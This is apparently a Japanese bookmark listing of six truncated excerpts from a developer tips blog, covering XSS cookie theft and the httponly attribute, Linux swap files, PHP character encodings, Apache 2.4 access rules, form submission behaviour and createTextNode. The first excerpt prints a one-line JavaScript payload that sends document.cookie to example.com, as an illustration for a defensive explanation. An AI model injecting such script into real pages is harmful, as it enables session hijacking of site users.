ブックマーク / www.softel.co.jp (6)
-
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。 取得されたcookieにセッションIDが含まれるとセッションIDが他人に知られるところとなる。 リンクを踏ませるなどの方法でHTML中に上のようなスクリプトを仕込むことができると、攻撃が成立する。 対策例 document.cookieで取得できてしまうから危険なのでは? → 発行するcookieにhttponly属性を付与して、document.cookieで取得できなくしよう WordPressでも以下のような書き方をしていた。PHP5.2.0で追加された第7引数でhttponly
-
手順はこちらの記事からの引用です。 http://piro791.blog.so-net.ne.jp/2009-03-05 同じように試してみて、できました。 swap領域の確認 現状のswap領域について確認するには /proc/swapsを見る。 [root@test-server1 ~]# cat /proc/swaps Filename Type Size Used Priority /dev/sda2 partition 2096472 2091628 -1 /dev/sda2に、およそ2GBのswap領域が作成されている。で、この2GBの領域をもうじき使い切りそうな勢いである。 swapを追加する方法としては、上記のように、ディスクにswap用のパーティションを作成する方法と、通常のファイルシステムの上にswap用のファイルを作成し、それをあたかもswap専用の領域として使わせ
-
問題 phpでShift_JISからEUC-JPなど文字コード変換しているのですが、はしご高、㈱などの環境依存文字︵機種依存文字︶って化けますよね? 答え php5.2.1から文字コードCP51932やiso-2022-jp-msが使えるようになっていて、これがあるかどうかでだいぶ違う。 CP51932 とは、EUC-JP系の文字コードで、Windows特有の文字︵IBM拡張文字︶が範囲に含まれる文字コード。[ [ [ euc-jp領域 ] eucjp-win領域 ] CP51932領域 ] みたいな具合。IBM拡張文字には、はしご高や異体字の黒、館、塚 etc. が含まれる。 iso-2022-jp-ms は、PHP5.2.1 から追加された拡張エンコードで、iso-2022-jp でサポートされていない範囲の半角カナや機種依存文字等などに対応したエンコード。 CP51932、iso-2
-
問題 apache 2.4.1で、VirtualHostで指定したディレクトリがどうしてもForbiddenになる。 答え アクセス許可の仕方が変わっていた。下のように書き換えたら上手くいきました。 ︻修正前︼ <Directory "/home/www"> Order allow,deny Allow from all </Directory> ︻修正後︼ <Directory "/home/www"> Require all granted </Directory> apache2.4系では、こんな基本的な設定部分が変わっているんですね。 NameVirtualHostの記述も必要なくなってるようです。 とりあえず全拒否の場合は、以下のように書く。 ︻修正前︼ <Directory "/home/www"> Order deny,allow Deny from all </Direct
-
︻HTML︼入力欄が1つだけのフォームはEnterキー押下でsubmitされる。submitボタンがなくても。 問題 フォームがEnterキー押下でsubmitしてくれたり、くれなかったりするのですが、何かルールがあるのですか。 特に、サブミットボタンがないフォームについて。 特に、入力欄が1つのときと、2つのときの違いについて。 例1 form内にinput[type=”text”]が1つだけ <form method="post" action="?"> <input type="text" name="test"> </form> Enter押下でSubmitします︵だいたいのブラウザで︶ 例2 form内にinput[type=”text”]が2つある <form method="post" action="?"> <input type="text" name="test"> <
-
問題 document.getElementById(“xxx”).innerHTML = “»”; は » が表示される。 document.getElementById(“xxx”).appendChild(document.createTextNode(“»”)); は » が表示される。 createTextNode使いたいんだけど、どうしたらいい? 答え こうしてください。 document.getElementById("xxx").appendChild(document.createTextNode("\u00bb")); createTextNodeに渡すのは、HTMLの中の文字列ではなくて、Javascriptの純粋な文字列。 createTextNodeに渡す文字列に、HTMLエンティティは使えないけど、U+****形式︵Unico
-
1
Cookieを盗む例とhttponly属性 at softelメモ
Linuxのswap領域を追加する方法 at softelメモ
【php】はしご高が文字化けしない文字コード変換 at softelメモ
【apache】2.4系はアクセス許可の設定の書き方が違うので注意 at softelメモ
【HTML】入力欄が1つだけのフォームはEnterキー押下でsubmitされる。submitボタンがなくても。 at softelメモ
【javascript】innerHTMLとcreateTextNode at softelメモ
